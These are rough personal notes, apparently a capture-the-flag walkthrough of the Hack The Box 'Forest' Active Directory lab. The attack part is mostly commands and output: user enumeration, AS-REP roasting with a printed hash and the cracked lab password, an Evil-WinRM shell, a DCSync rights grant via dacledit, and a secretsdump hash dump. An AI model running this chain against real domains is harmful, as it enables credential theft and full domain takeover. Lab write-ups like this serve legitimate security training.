Forest AD machine HTB
Start
Scanning by nmap
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-11-24T03:14:39
work 0 VPN 1 code 2 vscode 3 newZSH 4 bloodhound 5 zsh 6 code 7 win7 8 zsh 9 zsh- 10 code*
Enumerate
lika@learning:~/Downloads/CVE-2024-8353$ netexec smb $IP
[*] Adding missing option 'check_guest_account' in config section 'nxc' to nxc.conf
[*] Adding missing section 'BloodHound-CE' to nxc.conf
[*] Adding missing option 'bhce_enabled' in config section 'BloodHound-CE' to nxc.conf
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False) (Null Auth:True)
netexec smb $target -u '' -p '' --users
netexec smb $target -u '' -p '' --rid-brute
netexec smb $target -u 'guest' -p '' --rid-brute
netexec ldap $target -u 'guest' -p '' --users
netexec ldap $target -u 'guest' -p '' --rid-brute
netexec ldap $target -u '' -p '' --users
Get list user
netexec ldap $target -u '' -p '' --users | grep -i 'sidtypeuser' | awk '{print $6}' | cut -d '\' -f2 | tee users.txt
netexec ldap $target -u '' -p '' --users | awk '{print $5}' | fgrep -v '[*]' | tee users.txt
Add domain to host
Enu keberos list user
netexec ldap $target -u 'users1.txt' -p '' -k
LDAP 10.10.10.161 389 FOREST [-] htb.local\Administrator: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\Guest: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\DefaultAccount: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\krbtgt: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\$331000-VK4ADACQNUCA: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\SM_2c8eef0a09b545acb: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\SM_ca8c2ed5bdab4dc9b: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\SM_75a538d3025e4db9a: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\SM_681f53d4942840e18: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\SM_1b41c9286325456bb: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\SM_9b69f1b9d2cc45549: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\SM_7c96b981967141ebb: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\SM_c75ee099d0a64c91b: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\SM_1ffab36a2f5f479cb: KDC_ERR_CLIENT_REVOKED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailboxc3d7722: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailboxfc9daad: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailboxc0a90c9: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailbox670628e: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailbox968e74d: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailbox6ded678: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailbox83d6781: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailboxfd87238: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailboxb01ac64: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailbox7108a4e: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\HealthMailbox0659cc1: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\sebastien: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\lucinda: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [+] htb.local\svc-alfresco account vulnerable to asreproast attack
LDAP 10.10.10.161 389 FOREST [-] htb.local\andy: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\mark: KDC_ERR_PREAUTH_FAILED
LDAP 10.10.10.161 389 FOREST [-] htb.local\santi: KDC_ERR_PREAUTH_FAILED
Run this
netexec ldap $target -u 'users1.txt' -p '' -k --asreproast asrep.txt
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
LDAP 10.10.10.161 389 FOREST $krb5asrep$23$svc-alfresco@HTB.LOCAL:97996e5d4e091c10106f44b6a916717d$2480b0fa852f323f8729de5983dca6f34787e2f09c25f163d918e2433bef60996db5bbdcb8def50487a74fa060e38a1abfc29a43fdc670de22e8d57039eac1aeaa07e3d8f7e99226f8af5b9af81e6f77de3be29eb3a6b2fd96e7a9028a6edb8e0bdd8d06e6c562461ab8d829735eaf79481e619a84f7c46ac930b661d9860984ca67c29702e0c891ae2d6b4bbaa93c30bc5bc4ee24793780f9a32a885941e7fec8650c5b0105b59e5c51d9b5926d8e53b8ba3f5e10f834b2e98c1c6ad4a854d823a30b63aab12785c97373f7f3e6e788c9c2e8c87dbdbb6d29eff4a924ecea50e7df368670ae
impacket-GetUserSPNs -dc-ip $target 'htb.local/svc-alfresco:s3rvice' -request
Không hoạt động
Enum target
Thử tất các case port smb, rdp, ldap ..... Sau khi thử hết thì win RM có quyền admin
netexec: error: unrecognized arguments: -svc-alfresco
lika@learning:~/Downloads/CVE-2024-8353$ netexec smb $target -u 'svc-alfresco' -p 's3rvice'
SMB 10.10.10.161 445 FOREST [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.10.10.161 445 FOREST [+] htb.local\svc-alfresco:s3rvice
lika@learning:~/Downloads/CVE-2024-8353$ netexec rdp $target -u 'svc-alfresco' -p 's3rvice'
lika@learning:~/Downloads/CVE-2024-8353$ netexec winrm $target -u 'svc-alfresco' -p 's3rvice'
WINRM 10.10.10.161 5985 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
WINRM 10.10.10.161 5985 FOREST [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
lika@learning:~/Downloads/CVE-2024-8353$ evil-winrm -i $target -u 'svc-alfresco' -p s3rvice
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
run whoami /all
Wget powerup.ps1 Và . .\PowerUp.ps1 Invoke-AllChecks -> để ý dấu . . có space
Chạy bloodhound netexec ldap $target -u 'svc-alfrosco' -p 's3rvice' --bloodhound --collection All --dns-server $target
net rpc group members "Exchange Windows Permissions" -U "htb.local"/"svc-alfresco"%"s3rvice" -S "htb.local" HTB\Exchange Trusted Subsystem
net rpc group addmem "Exchange Windows Permissions" "svc-alfresco" -U "htb.local"/"svc-alfresco"%"s3rvice" -S "htb.local"
net rpc group members "Exchange Windows Permissions" -U "htb.local"/"svc-alfresco"%"s3rvice" -S "htb.local"
impacket-dacledit -action 'write' -rights 'DCSync' -principal 'svc-alfresco' -target-dn 'DC=htb,DC=local' 'htb.local'/'svc-alfresco':'s3rvice'
Add lại chạy lại thì được
net rpc group members "Exchange Windows Permissions" -U "htb.local"/"svc-alfresco"%"s3rvice" -S "htb.local" HTB\Exchange Trusted Subsystem
net rpc group addmem "Exchange Windows Permissions" "svc-alfresco" -U "htb.local"/"svc-alfresco"%"s3rvice" -S "htb.local"
net rpc group members "Exchange Windows Permissions" -U "htb.local"/"svc-alfresco"%"s3rvice" -S "htb.local"
impacket-secretsdump -just-dc-ntlm htb.local/svc-alfresco:s3rvice@$target